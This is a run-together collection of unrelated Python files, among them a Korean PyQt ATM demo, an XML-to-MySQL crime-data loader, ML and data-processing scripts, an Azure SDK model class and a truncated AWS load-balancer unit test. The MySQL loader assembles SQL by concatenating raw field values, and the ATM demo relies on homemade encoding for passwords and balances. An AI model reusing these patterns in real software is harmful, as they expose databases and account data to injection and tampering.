"정보를 모두 입력해주세요"(이)라고 출력 만약 ID 또는 Password를 입력하고 회원가입 버튼을 눌렀다면 만약 입력한 ID값이 userTable에 'Name'(이)라는 열에 있다면 "이미 있는 아이디입니다"(이)라고 출력 만약 입력한 PW값과 입력한 re_PW값이 같지 않다면 "두 비밀번호가 일치하지 않습니다."(이)라고 출력 만약 입력한 ID값이 userTable에 'Name'(이)라는 열에 없다면 입력한 나이값을 int형으로 형변환 하는 과정에서 문제가 발생하지 않았을 때 새로운 계좌번호를 저장할 newAccli를 선언 무한 반복 0부터 18까지 반복 만약 i가 4 또는 9 또는 14일 경우 newAccli에 "-" 추가 만약 i가 4 또는 9 또는 14가 아닐 경우 newAccli에 1부터 9까지의 랜덤 숫자 저장 입력한 나이값을 int형으로 형변환 하는 과정에서 문제가 발생했을 때 "나이를 잘못 입력하셨습니다"(이)라고 출력 만약 newAccli가 userTable에 'accNum'(이)라는 열에 없다면 ID라는 변수에 입력한 ID값을 인코딩 이때 발생한 key값과 value값을 각각 keyID, valueID로 저장 PW라는 변수에 입력한 PW값을 인코딩 이때 발생한 key값과 value값을 각각 keyPW, valuePW로 저장 userinformation이라는 변수 판다스 데이터프레임 함수를 이용하여 'Name' 열에는 valueID를, 'PW' 열에는 valuePW를, 'Money' 열에는 0을, 'Age' 열에는 입력한 나이값을, 'accNum' 열에는 newAccli를, 'keyID' 열에는 keyID를, 'keyPW' 열에는 keyPW을 저장 무한 반복문 종료 "회원가입에 성공했습니다."(이)라고 출력 """ def signup(self): msg = QMessageBox() global userTable if not self.lineEdit_ID.text() or not self.lineEdit_password.text() or not self.lineEdit_password_check.text() or not self.lineEdit_age.text(): msg.setText('정보를 모두 입력해주세요') msg.exec_() else: for i in range(len(userID)): if PWEncoding(self.lineEdit_ID.text()) in userID: msg.setText('이미 있는 아이디입니다.') msg.exec_() return if self.lineEdit_password.text() != self.lineEdit_password_check.text(): msg.setText('두 비밀번호가 일치하지 않습니다.') msg.exec_() return elif self.lineEdit_ID.text() not in Decoding(userID[i][1], userID[i][0]): try: lineEdit_age = int(self.lineEdit_age.text()) except: msg.setText('나이를 잘못 입력하셨습니다') 
msg.exec_() return newAccli = "" for i in range(3): newAccli += str(random.randint(1000, 9999)) + "-" newAccli += str(random.randint(1000, 9999)) if newAccli not in str(userTable['accNum']): ID = Encoding(self.lineEdit_ID.text()) PW = PWEncoding(self.lineEdit_password.text()) money = Encoding("0") userinformation = pd.DataFrame( [{'Name': ID[1], 'Pw': PW, 'Money': money[1], 'Age': lineEdit_age, 'Rate': 6, 'accNum': newAccli, 'keyID': ID[0], 'keyMoney': money[0]}]) userTable = pd.concat( [userTable, userinformation], ignore_index=True) msg.setText('회원가입에 성공했습니다.') msg.exec_() self.close() # 로그인 폼 class MainForm(QWidget): def __init__(self): super().__init__() self.setWindowTitle("Astro - ATM") self.resize(180, 500) layout = QGridLayout() toplayout = QHBoxLayout() # 조우식 잡다한버튼 button_login = QPushButton("로그아웃") button_login.clicked.connect(self.logout) layout.addWidget(button_login, 3, 1) layout.setRowMinimumHeight(2, 40) button_in = QPushButton("입금") button_in.setMaximumWidth(80) button_in.clicked.connect(self.inMoney) layout.addWidget(button_in, 1, 0) layout.setRowMinimumHeight(2, 40) button_out = QPushButton("출금") button_out.setMaximumWidth(80) button_out.clicked.connect(self.outMoney) layout.addWidget(button_out, 1, 1) layout.setRowMinimumHeight(2, 40) button_borrow = QPushButton("대출") button_borrow.setMaximumWidth(80) button_borrow.clicked.connect(self.loanMoney) layout.addWidget(button_borrow, 3, 0) layout.setRowMinimumHeight(2, 40) button_trans = QPushButton("이체") button_trans.setMaximumWidth(100) button_trans.setMaximumHeight(100) button_trans.setStyleSheet("background-color : #AADBDD;" "border-radius: 50%;" "width: 100px;" "height: 100px;") button_trans.clicked.connect(self.trans) toplayout.addWidget(button_trans) # layout.setRowMinimumHeight(2, 40) button_count = QPushButton("잔액조회") button_count.setMaximumWidth(80) button_count.clicked.connect(self.count) layout.addWidget(button_count, 2, 0) layout.setRowMinimumHeight(2, 40) button_creditrating = QPushButton("신용 조회") button_creditrating.setMaximumWidth(80) button_creditrating.clicked.connect(self.creditrating) layout.addWidget(button_creditrating, 2, 1) layout.setRowMinimumHeight(2, 40) mainlayout = QVBoxLayout() mainlayout.addLayout(toplayout) mainlayout.addLayout(layout) self.setLayout(mainlayout) # 로그아웃 시스템 def logout(self): global loginedLine, loginAction msg = QMessageBox() msg.setText("로그아웃되었습니다.") loginAction = False # 로그인 액션 초기화 loginedLine = -1 # 로그인라인 초기화 self.loginform = LoginForm() # 로그인 폼 self.loginform.setGeometry(QRect(100, 100, 500, 600)) self.loginform.show() # 로그인 폼 표시 self.close() # 메인폼 끄기 msg.exec_() """ # 이체 시스템 로직: 만약 로그인이 안되어 있으면 로그인이 필요하다고 출력 만약 로그인이 되어 있으면 user는 inputAccNum에 상대방 계좌번호 입력 만약 inputAccNum이 userTable에 'accNum'(이)라는 열에 있다면 보낼 금액을 transMoney에 저장 transMoney가 int형으로 형변환 하는 과정에서 아무 문제도 발생하지 않았을 때 만약 transMoney가 user가 가진 금액보다 크다면 잔액이 부족하다고 출력 만약 transMoney가 이체 가능한 최소 비용보다 작다면 보내지 못한다고 출력 아무 문제가 없다면 userTable에 index만큼 반복 만약 inputAccNum이 userTable에 'accNum'(이)라는 열에 i번째 행 데이터와 같다면 반복문 탈출 userTable에 'Money'라는 열에 loginedLine번째 행 데이터를 userTable에 'Money'라는 열에 loginedLine번째 행 데이터 - transMoney로 저장 userTable에 'Money'라는 열에 i번째 행 데이터를 userTable에 'Money'라는 열에 i번째 행 데이터 + transMoney로 저장 DB폴더에 trans.log 파일을 만들고 이 파일을 file(이)라는 변수로 저장 이체할 때마다 돈을 보낸 사람 -> 돈을 받은 사람 : 금액 형식으로 저장 ex) 6852-2588-5453-1555->9532-6723-8939-7668:1233 "inputAccNum번호로 transMoney원 이체 완료했습니다."라고 출력 transMoney가 int형으로 형변환 하는 과정에서 valueError가 발생했을 때 "정확한 금액을 입력해주세요"(이)라고 출력 만약 inputAccNum이 userTable에 'accNum'(이)라는 열에 없다면 "해당 계좌는 존재하지 않습니다."(이)라고 출력 
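    (English summary of the transfer logic above: if the user is not logged in,
    ask them to log in. Otherwise prompt for the recipient's account number; if
    it exists in userTable['accNum'], prompt for the amount. If the amount
    cannot be parsed as an int, ask for a valid amount; if it exceeds the
    sender's balance, report insufficient funds; if it is below the minimum
    transferable amount, refuse. Otherwise subtract the amount from the
    sender's row, add it to the recipient's row, append a
    "sender->recipient:amount" record to DB/trans.log, and report that the
    transfer completed. If the account number is not found, report that the
    account does not exist.)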
""" def trans(self): msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: inputAccNum, dialog = QInputDialog.getText( self, 'Input Dialog', '보낼 사람의 계좌를 입력해주세요. :') if not inputAccNum: msg.setText("계좌번호를 정확히 입력해 주세요") msg.exec_() else: if inputAccNum in str(userTable['accNum']): transMoney, dialog1 = QInputDialog.getText( self, 'Input Dialog', '얼마를 보내시겠습니까? :') try: transMoney = int(transMoney) except: msg.setText("이체할 금액을 정확히 입력해 주세요") msg.exec_() return if transMoney > int(Decoding(userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])): msg.setText("잔액이 부족합니다.") msg.exec_() elif transMoney < 100: msg.setText("이체 가능한 최소 비용은 100원입니다.") msg.exec_() else: for i in range(len(userTable.index)): if inputAccNum == userTable['accNum'].iloc[i]: break userTable['Money'].iloc[loginedLine] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) - transMoney))[1] userTable['keyMoney'].iloc[loginedLine] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) - transMoney))[0] userTable['Money'].iloc[i] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[i], userTable['Money'].iloc[i])) + transMoney))[1] userTable['keyMoney'].iloc[i] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[i], userTable['Money'].iloc[i])) + transMoney))[0] with open("DB/trans.log", "a", encoding="UTF8") as file: tmp = Encoding(str(transMoney)) res = uniqueEncode( userTable['accNum'].iloc[loginedLine], inputAccNum, tmp[0], tmp[1]) file.write(f"{res}\n") msg.setText( f"{inputAccNum}번호로 {transMoney}원 이체 완료했습니다.") msg.exec_() else: msg.setText("해당 계좌는 존재하지 않습니다.") msg.exec_() """ # LRU Cache를 이용한 잔액조회 시스템 로직: 만약 로그인이 안되어 있으면 로그인이 필요하다고 출력 만약 로그인이 되어 있으면 userName을 userTable에 'Name'(이)라는 열, loginedLine번째 행 데이터를 저장 userMoney를 userTable에 'Money'(이)라는 열, loginedLine번째 행 데이터를 저장 만약 countCache.nodeMap에 userName이라는 key에 카운트가 3 이상이라면 countCache에 저장되어 있던 userName이라는 key에 value값을 출력 만약 countCache.nodeMap에 userName이라는 key에 카운트가 3 이상이 아니라면 userMoney 출력 countCache에 key가 userName이고, value가 userMoney인 값을 저장 """ def count(self): msg = QMessageBox() start = time.time() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: userName = userTable['Name'].iloc[loginedLine] countCache.put(userName, Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) if countCache.nodeMap.get(userName, [-1, 0])[1] >= 3: msg.setText( f"{str(countCache.get(userName))}원 있습니다.") print("Cache Count time :", time.time() - start) msg.exec_() else: time.sleep(1) msg.setText( f"{Decoding(userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])}원 있습니다.") print("Count time :", time.time() - start) msg.exec_() """ # 출금 시스템 # 주석 추가 부탁 """ def outMoney(self): global userTable, loginedLine msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: try: outMoney, dialog = QInputDialog.getText( self, 'Input Dialog', '출금할 금액 :') if int(outMoney) > int(Decoding(userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])): msg.setText("잔액이 부족합니다.") msg.exec_() else: enco = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) - int(outMoney))) userTable['Money'].iloc[loginedLine] = enco[1] userTable['keyMoney'].iloc[loginedLine] = enco[0] msg.setText(f"{outMoney}원을 출금 완료했습니다.") msg.exec_() except ValueError: msg.setText("정확한 금액을 입력해주세요") 
msg.exec_() """ # 입금 시스템 로직: 만약 로그인이 안되어 있으면 로그인이 필요하다고 출력 만약 로그인이 되어 있으면 inMoney에 입금할 금액 저장 inMoney를 int형으로 형변환 하는 과정에서 아무 문제도 발생하지 않았을 때 userTable에 'Money'열, loginedLine번째 행 데이터에서 inMoney값을 더함 "입금 완료"(이)라고 출력 inMoney를 int형으로 형변환 하는 과정에서 valueError가 발생했을 때 "정확한 금액을 입력해주세요"(이)라고 출력 """ def inMoney(self): global userTable, loginedLine msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: try: inMoney, dialog = QInputDialog.getText( self, 'Input Dialog', '입금할 금액 :') enco = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) + int(inMoney))) userTable['Money'].iloc[loginedLine] = enco[1] userTable['keyMoney'].iloc[loginedLine] = enco[0] msg.setText(inMoney + "원을 입금 완료했습니다.") msg.exec_() except ValueError: msg.setText("정확한 금액을 입력해주세요") msg.exec_() """ # 대출 시스템 # 주석 추가 부탁 """ def loanMoney(self): msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: try: loan, dialog = QInputDialog.getText( self, 'Input Dialog', '대출 금액 :') # userTable['Money'].iloc[loginedLine] += int(loan) userTable['Money'].iloc[loginedLine] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) + int(loan)))[1] userTable['keyMoney'].iloc[loginedLine] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) + int(loan)))[0] msg.setText(loan+"원 대출완료") msg.exec_() msg.setText("당신의 금리: %f" % userTable['Rate'].iloc[loginedLine]) msg.exec_() except ValueError: msg.setText("정확한 금액을 입력해주세요") msg.exec_() """ # 선형 회귀를 이용한 신용 등급 조회 시스템 # 주석 추가 부탁 """ def creditrating(self): msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: if lin.linear_regression(userTable, 'Age', 'keyMoney', 'Money', userTable['Age'].iloc[loginedLine], int(Decoding(userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine]))) == 1: userTable['Rate'].iloc[loginedLine] = 2.8 msg.setText("당신의 신용등급은 높습니다.") msg.exec_() else: userTable['Rate'].iloc[loginedLine] = 4.8 msg.setText("당신의 신용등급은 낮습니다.") msg.exec_() if __name__ == '__main__': app = QApplication(sys.argv) form = LoginForm() form.show() sys.exit(app.exec_()) avyayjain/Python_ScriptsAutomation/QrScanner/QrScanner.py import cv2 ##import the module opencv import numpy as np ##import the module numpy import pyzbar.pyzbar as pyzbar ##import the module pyzbar img = cv2.imread("QR.png") ##read your image decode_QR = pyzbar.decode(img) ##function to decode QR for i in decode_QR: print("your scanned QR :",i.data) cv2.imshow("QR ", img) ##display Cropped image cv2.waitKey(0) crazysal/chemml __all__ = ["materials", "utilities"]def start(msg, bot, session): bot.send_message( msg.chat.id, "Hi, {0}.\nYou send: {1}".format(msg.chat.id, msg.text) ) return start AstrorEnales/CodeEval0 import sys lines = open(sys.argv[1], 'r') for line in lines: line = line.replace('\n', '').replace('\r', '') if len(line) > 0: n, m = [int(x) for x in line.split(',')] if m > n: print(n) else: intPart = n / m floatPart = n / float(m) diff = floatPart - intPart print(int(round(diff * m))) lines.close() import sys import xml.etree.ElementTree as ET import re import MySQLdb tree = ET.parse(sys.argv[1]) root = tree.getroot() db = MySQLdb.connect(host="localhost",user="root",passwd="",db="bitcamp1") cur = db.cursor() for child in root: obj = {} for items in child: obj[items.tag[len("{http://dc.gov/dcstat/types/1.0/}"):]] = items.text 
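        # Descriptive note: each child element is stored under its tag with the
        # "{http://dc.gov/dcstat/types/1.0/}" namespace prefix stripped; the check
        # below substitutes the literal string "null" for missing element text
        # before the INSERT statements are assembled by string concatenation.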
if(obj[items.tag[len("{http://dc.gov/dcstat/types/1.0/}"):]] is None): obj[items.tag[len("{http://dc.gov/dcstat/types/1.0/}"):]] = "null" time_division = obj["reportdatetime"].split("T") day_time = time_division[0].split("-") time_hour = time_division[1].split("-") query1 = ("Insert into CrimeLocation values (" + obj["neighborhoodcluster"] + "," + '"' + obj["district"] + '"' + "," + '"' + obj["block_group"] + '"' + "," + '"' + obj["ward"] + '"' + "," + '"' + obj["anc"] + '"' + "," + obj["blockxcoord"] + "," + obj["blockycoord"] + ");") query2 = ("Insert into ReportedCrimes values (" + obj["ccn"] + "," + '"' + obj["reportdatetime"] + '"' + "," + day_time[0] + "," + day_time[1] + "," + day_time[2] + "," + '"' + time_hour[0] + '"' + "," + '"' + time_hour[1] + '"' + "," + '"' + obj["shift"] + '"' + "," + '"' + obj["offense"] + '"' + "," + '"' + obj["method"] + '"' + "," + '"' + obj["lastmodifieddate"] + '"' + "," + '"' + obj["blocksiteaddress"] + '"' + "," + '"' + obj["businessimprovementdistrict"] + '"' + "," + obj["blockxcoord"] + "," + obj["blockycoord"] + "," + obj["psa"] + "," + obj["census_tract"] + "," + '"' + obj["voting_precinct"] + '"' + "," + '"' + obj["start_date"] + '"' + "," + '"' + obj["end_date"] + '"' + ");") #print query1 #print query2 try: cur.execute(query1) cur.execute(query2) db.commit() except: db.rollback() db.close() 0 import numpy as np import xarray as xr import pandas as pd from sys import argv from glob import glob scriptdir = '/uufs/chpc.utah.edu/common/home/u1070830/code/model-tools/era5/' profdir = '/uufs/chpc.utah.edu/common/home/u1070830/mewessler/era5/profiles/' lat, lon = argv[1:] lat, lon = float(lat), float(lon) flist = glob(profdir + 'disagg/' '*%s*%s*.nc'%(lat, abs(lon))) iso, sfc = [], [] for f in flist: d = xr.open_dataset(f) if 'level' in list(d.dims): iso.append(d.to_dataframe(#).drop(columns=['latitude', 'longitude'] ).reset_index().set_index(['time', 'level']).sort_index()) else: sfc.append(d.to_dataframe())#.drop(columns=['latitude', 'longitude'])) isomerge = None for i in range(1, len(iso)): print('Merging isobaric variable %d/%d'%(i, len(iso)-1)) if isomerge is not None: isomerge = isomerge.merge(iso[i], on=['time', 'level']) else: isomerge = iso[i-1].merge(iso[i], on=['time', 'level']) isomerge = isomerge[~isomerge.index.duplicated()] sfcmerge = None for i in range(1, len(sfc)): print('Merging surface variable %d/%d'%(i, len(sfc)-1)) if sfcmerge is not None: sfcmerge = sfcmerge.merge(sfc[i], on=['time']) else: sfcmerge = sfc[i-1].merge(sfc[i], on=['time']) sfcmerge = sfcmerge[~sfcmerge.index.duplicated()] sfcmerge = sfcmerge.rename( columns={k:k[-1] + k.replace('VAR_', '')[:-1] + 'M' for k in sfcmerge.keys() if 'VAR_' in k}) merge = xr.merge([isomerge.to_xarray(), sfcmerge.to_xarray()]) savestr = 'era5prof_%.2fN_%.2fW.nc'%(lat, abs(lon)) print('Saving: %s'%savestr) merge.to_netcdf(profdir + savestr) exit()import numpy as np from ml.model import NumberRecognizeNN from ml.data_processor import DataProcessor class ModelAPI(): def __init__(self, resource): self.resource = resource self.model = NumberRecognizeNN(resource.INPUT_SIZE, resource.OUTPUT_SIZE) resource.load_model(self.model) means, stds = resource.load_normalization_params() self.dp = DataProcessor(means, stds) def predict(self, data): _data = data if isinstance(data, (tuple, list)): _data = np.array([data], dtype=np.float32) f_data = self.dp.format_x(_data, size=self.resource.INPUT_SIZE) predicted = self.model(f_data) number = np.argmax(predicted.data, axis=1) return number # 
coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from .proxy_only_resource_py3 import ProxyOnlyResource class SiteExtensionInfo(ProxyOnlyResource): """Site Extension Information. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Resource Id. :vartype id: str :ivar name: Resource Name. :vartype name: str :param kind: Kind of resource. :type kind: str :ivar type: Resource type. :vartype type: str :param extension_id: Site extension ID. :type extension_id: str :param title: :type title: str :param extension_type: Site extension type. Possible values include: 'Gallery', 'WebRoot' :type extension_type: str or ~azure.mgmt.web.models.SiteExtensionType :param summary: Summary description. :type summary: str :param description: Detailed description. :type description: str :param version: Version information. :type version: str :param extension_url: Extension URL. :type extension_url: str :param project_url: Project URL. :type project_url: str :param icon_url: Icon URL. :type icon_url: str :param license_url: License URL. :type license_url: str :param feed_url: Feed URL. :type feed_url: str :param authors: List of authors. :type authors: list[str] :param installer_command_line_params: Installer command line parameters. :type installer_command_line_params: str :param published_date_time: Published timestamp. :type published_date_time: datetime :param download_count: Count of downloads. :type download_count: int :param local_is_latest_version: true if the local version is the latest version; false otherwise. :type local_is_latest_version: bool :param local_path: Local path. :type local_path: str :param installed_date_time: Installed timestamp. :type installed_date_time: datetime :param provisioning_state: Provisioning state. :type provisioning_state: str :param comment: Site Extension comment. 
:type comment: str """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'kind': {'key': 'kind', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'extension_id': {'key': 'properties.extension_id', 'type': 'str'}, 'title': {'key': 'properties.title', 'type': 'str'}, 'extension_type': {'key': 'properties.extension_type', 'type': 'SiteExtensionType'}, 'summary': {'key': 'properties.summary', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'version': {'key': 'properties.version', 'type': 'str'}, 'extension_url': {'key': 'properties.extension_url', 'type': 'str'}, 'project_url': {'key': 'properties.project_url', 'type': 'str'}, 'icon_url': {'key': 'properties.icon_url', 'type': 'str'}, 'license_url': {'key': 'properties.license_url', 'type': 'str'}, 'feed_url': {'key': 'properties.feed_url', 'type': 'str'}, 'authors': {'key': 'properties.authors', 'type': '[str]'}, 'installer_command_line_params': {'key': 'properties.installer_command_line_params', 'type': 'str'}, 'published_date_time': {'key': 'properties.published_date_time', 'type': 'iso-8601'}, 'download_count': {'key': 'properties.download_count', 'type': 'int'}, 'local_is_latest_version': {'key': 'properties.local_is_latest_version', 'type': 'bool'}, 'local_path': {'key': 'properties.local_path', 'type': 'str'}, 'installed_date_time': {'key': 'properties.installed_date_time', 'type': 'iso-8601'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'comment': {'key': 'properties.comment', 'type': 'str'}, } def __init__(self, *, kind: str=None, extension_id: str=None, title: str=None, extension_type=None, summary: str=None, description: str=None, version: str=None, extension_url: str=None, project_url: str=None, icon_url: str=None, license_url: str=None, feed_url: str=None, authors=None, installer_command_line_params: str=None, published_date_time=None, download_count: int=None, local_is_latest_version: bool=None, local_path: str=None, installed_date_time=None, provisioning_state: str=None, comment: str=None, **kwargs) -> None: super(SiteExtensionInfo, self).__init__(kind=kind, **kwargs) self.extension_id = extension_id self.title = title self.extension_type = extension_type self.summary = summary self.description = description self.version = version self.extension_url = extension_url self.project_url = project_url self.icon_url = icon_url self.license_url = license_url self.feed_url = feed_url self.authors = authors self.installer_command_line_params = installer_command_line_params self.published_date_time = published_date_time self.download_count = download_count self.local_is_latest_version = local_is_latest_version self.local_path = local_path self.installed_date_time = installed_date_time self.provisioning_state = provisioning_state self.comment = comment machine_learning/decision_tree/decision_tree_credit_risk.py # -*- coding: utf-8 -*- import os, sys from os.path import dirname, join import pandas as pd sys.path.append(os.path.abspath(os.getcwd())) from sklearn.preprocessing import LabelEncoder from utils.formats import Formats from sklearn.tree import DecisionTreeClassifier, export_graphviz formats = Formats() df = pd.read_csv(formats.path_database("risco_credito.csv")) previsores = df.iloc[:, 0:4].values classe = df.iloc[:, 4].values # Árvores de decisão não podem ser categoricos labelencoder = LabelEncoder() previsores[:, 
0] = labelencoder.fit_transform(previsores[:, 0])
previsores[:, 1] = labelencoder.fit_transform(previsores[:, 1])
previsores[:, 2] = labelencoder.fit_transform(previsores[:, 2])
previsores[:, 3] = labelencoder.fit_transform(previsores[:, 3])

decisionTree = DecisionTreeClassifier(criterion="entropy")
"""
Attributes
----------
feature_importances_ : ranks the importance of each attribute

Methods
-------
export_graphviz :
    dot_data : string
        graphical representation of the decision tree
"""
decisionTree = decisionTree.fit(previsores, classe)
# export_graphviz(
#     decisionTree,
#     out_file=os.path.abspath(join(dirname(os.getcwd()), 'python/tree_credit_risk.dot')),
#     feature_names=["historia", "divida", "garantias", "renda"],
#     class_names=["alto", "moderado", "baixo"],
#     filled=True,
#     leaves_parallel=True,
# )
result = decisionTree.predict([[0, 0, 1, 2], [3, 0, 0, 0]])
print(result)

from abc import ABC, abstractmethod
from .dataset_info import BaseDatasetInfo


class BaseDataset(ABC):
    def __init__(self, dataset_info: BaseDatasetInfo):
        self.dataset_info = dataset_info

    def __getitem__(self, idx):
        """Iterate through the dataset.

        Args:
            idx: can be a single index or a range

        Returns:
            requested sample(s)
        """
        if isinstance(idx, int):
            if idx >= self.__len__():
                raise IndexError
            return self._get_single_item(idx)
        stop = min(self.__len__(), idx.stop)
        return [self.__getitem__(i) for i in range(idx.start, stop, idx.step)] if idx.step else [self.__getitem__(i) for i in range(idx.start, stop)]

    @property
    @abstractmethod
    def labels(self):
        pass

    @abstractmethod
    def __len__(self):
        pass

    @abstractmethod
    def _get_single_item(self, index):
        pass

    @abstractmethod
    def close(self):
        """Release resources."""
        pass

Aerex/GamestonkTerminal
""" CNN View """
__docformat__ = "numpy"

import os

import matplotlib.pyplot as plt
from pandas.plotting import register_matplotlib_converters

from gamestonk_terminal import feature_flags as gtff
from gamestonk_terminal.config_plot import PLOT_DPI
from gamestonk_terminal.economy import cnn_model
from gamestonk_terminal.helper_funcs import plot_autoscale, export_data

register_matplotlib_converters()


def fear_and_greed_index(indicator: str, export: str):
    """Display CNN Fear And Greed Index. [Source: CNN Business]

    Parameters
    ----------
    indicator : str
        CNN Fear And Greed indicator or index. From Junk Bond Demand,
        Market Volatility, Put and Call Options, Market Momentum,
        Stock Price Strength, Stock Price Breadth, Safe Haven Demand, and Index.
export : str Export plot to png,jpg,pdf file """ fig = plt.figure(figsize=plot_autoscale(), dpi=PLOT_DPI) report, im = cnn_model.get_feargreed_report(indicator, fig) print(report) if indicator: plt.imshow(im) export_data( export, os.path.dirname(os.path.abspath(__file__)), "feargreed", ) if gtff.USE_ION: plt.ion() plt.show() from moviepy.editor import concatenate_videoclips, VideoFileClip, AudioFileClip, CompositeAudioClip, concatenate_audioclips class Convert: def __init__(self, videoClips): self.video = VideoFileClip(videoClips) self.constIphone = VideoFileClip("/".join(__file__.split("/")[:-1])+"/iphone.mp4") self.audio = AudioFileClip("/".join(__file__.split("/")[:-1])+"/iphone.mp3") def __repr__(self): return f"" def Merge(self, OutPut): merged = concatenate_videoclips([self.video, self.constIphone.resize(self.video.size)]) mixaudio = CompositeAudioClip([ self.audio.subclip(0, audio1:=(self.audio.duration-self.constIphone.duration)+1), self.video.audio.subclip(audio2:=self.video.duration-audio1) ]) if self.video.duration-audio1 < 0: self.audio = AudioFileClip("/".join(__file__.split("/")[:-1])+"/iphone.mp3").subclip(audio1-self.video.duration) mixaudio = CompositeAudioClip([ self.audio.subclip(0, audio1:=(self.audio.duration-self.constIphone.duration)+1), self.video.audio.subclip(audio2:=self.video.duration-audio1) ]) merged.audio=concatenate_audioclips([ self.video.audio.subclip(0, audio2), mixaudio, self.audio.subclip(audio1) ]) merged.write_videofile(OutPut, threads=10) import logging from elb_load_monitor.alb_alarm_messages import ALBAlarmEvent from elb_load_monitor.alb_alarm_messages import ALBAlarmAction from elb_load_monitor.alb_alarm_messages import ALBAlarmStatusMessage from elb_load_monitor.alb_alarm_messages import CWAlarmState from elb_load_monitor.alb_listener_rules_handler import ALBListenerRulesHandler from unittest.mock import ANY, MagicMock import json import pathlib import unittest logger = logging.getLogger() logger.setLevel(logging.DEBUG) class TestALBListenerRulesHandler(unittest.TestCase): def setUp(self) -> None: self.elbv2_client = MagicMock() alb_listener_json = open(pathlib.Path( __file__).parent/'test_alb_listener.json', 'r') self.elbv2_client.describe_rules = MagicMock( return_value=json.loads(alb_listener_json.read())) alb_listener_json.close() self.cw_client_in_alarm = MagicMock() cw_in_alarm_json = open(pathlib.Path( __file__).parent/'test_cw_in_alarm.json', 'r') self.cw_client_in_alarm.describe_alarms = MagicMock( return_value=json.loads(cw_in_alarm_json.read())) cw_in_alarm_json.close() self.cw_client_ok = MagicMock() cw_ok_json = open(pathlib.Path(__file__).parent/'test_cw_ok.json', 'r') self.cw_client_ok.describe_alarms = MagicMock( return_value=json.loads(cw_ok_json.read())) cw_ok_json.close() self.cw_alarm_arn = 'arn:aws:cloudwatch:us-east-1:817387504538:alarm:ALB_test' self.cw_alarm_name = 'ALB_test' self.load_balancer_arn = 'arn:aws:elasticloadbalancing:us-east-1:817387504538:loadbalancer/app/AgentPortalALB/bb6bb42b08f94c0b' self.elb_listener_arn = 'arn:aws:elasticloadbalancing:us-east-1:817387504538:listener/app/AgentPortalALB/bb6bb42b08f94c0b/b3784a6b090b3696' self.elb_listener_rule_arn = 'arn:aws:elasticloadbalancing:us-east-1:817387504538:listener-rule/app/AgentPortalALB/bb6bb42b08f94c0b/b3784a6b090b3696/9758a586f4921acf' self.target_group_arn = 'arn:aws:elasticloadbalancing:us-east-1:817387504538:targetgroup/AppServerATG/090a4ba28ada9d48' self.secondary_target_group_arn = 
'arn:aws:elasticloadbalancing:us-east-1:817387504538:targetgroup/TestGroup/1566e30628006197' self.elb_shed_percent = 20 self.max_elb_shed_percent = 100 self.elb_restore_percent = 10 self.shed_mesg_delay_sec = 60 self.restore_mesg_delay_sec = 120 self.sqs_queue_url = 'test_queue_url' return def test_handle_alarm(self) -> None: alb_alarm_event = ALBAlarmEvent( alarm_event_id='some_id', alarm_arn=self.cw_alarm_arn, alarm_name=self.cw_alarm_name, cw_alarm_state=CWAlarmState.ALARM) sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alarm_action = alb_listener_rules_handler.handle_alarm( self.elbv2_client, sqs_client, self.sqs_queue_url, alb_alarm_event) self.assertEqual(alarm_action, ALBAlarmAction.SHED) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 80) self.elbv2_client.modify_rule.assert_called_with( RuleArn=self.elb_listener_rule_arn, Actions=ANY) message_body = { 'albAlarmAction': 'SHED', 'alarmArn': alb_alarm_event.alarm_arn, 'alarmName': alb_alarm_event.alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, 